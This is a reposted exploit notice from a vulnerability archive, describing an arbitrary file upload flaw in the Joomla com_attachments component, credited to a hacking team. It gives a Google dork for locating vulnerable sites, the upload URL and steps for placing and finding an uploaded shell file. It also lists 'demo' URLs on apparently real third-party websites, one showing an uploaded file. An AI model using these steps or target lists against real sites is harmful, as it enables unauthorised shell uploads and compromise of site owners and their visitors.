Joomla Attachments Shell Upload

2013.07.10
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

################################################ # Exploit Title: Joomla Com_Attachments Component Arbitrary File Upload Vulnerability # Google Dork: inurl:"index.php?option=com_attachments" # Date: 2013-07-09 # Exploit Author: Stars Hacking Team # We Are: S3Ri0uS , Satanic2000 , NuLLeRRoR , Mohamadpk , blackc0der # Email: Z3ro.Day@Hotmail.Com , Ste4ler_Mind@Yahoo.Com , Mr.Satanic2000@Rogers.Com # Vendor Homepage: http://joomla.org # Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/downloads/3115 # Tested on: Lin ################################################ # ~> ExpLoit <~ # # http://target/index.php?option=com_attachments&task=upload # # 1. Upload Your File . ! # 2. Find Your File in This Path: # http://target/attachments/article # 3. End :P # ############################################ # ~> DeMo <~ # http://www.iwalkforXlife.com/index.php?option=com_attachments&task=upload # http://www.iwalkXforlife.com/attachments/article/0/stars.jpg # ---- # http://www.lgbXsychology2013.com/index.php/en/?option=com_attachments&task=upload # http://www.saiXs-club.net/index.php?option=com_attachments&task=upload # http://www.projXt-establis.eu/index.php?option=com_attachments&task=upload ############################################ # Spt : Pejv4k , Skitt3r , Netw0rm , HUrr!c4nE , Kinglet , Skipp3r , AG , Amo Vahid , Ahmadbady , XzadX # iskorpitx , HellBoy , Cyber-Terrorist And All My Best Friend :X # Fuck All Lammer in Cyber :P ###########################################

References:

http://extensions.joomla.org/extensions/directory-a-documentation/downloads/3115


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top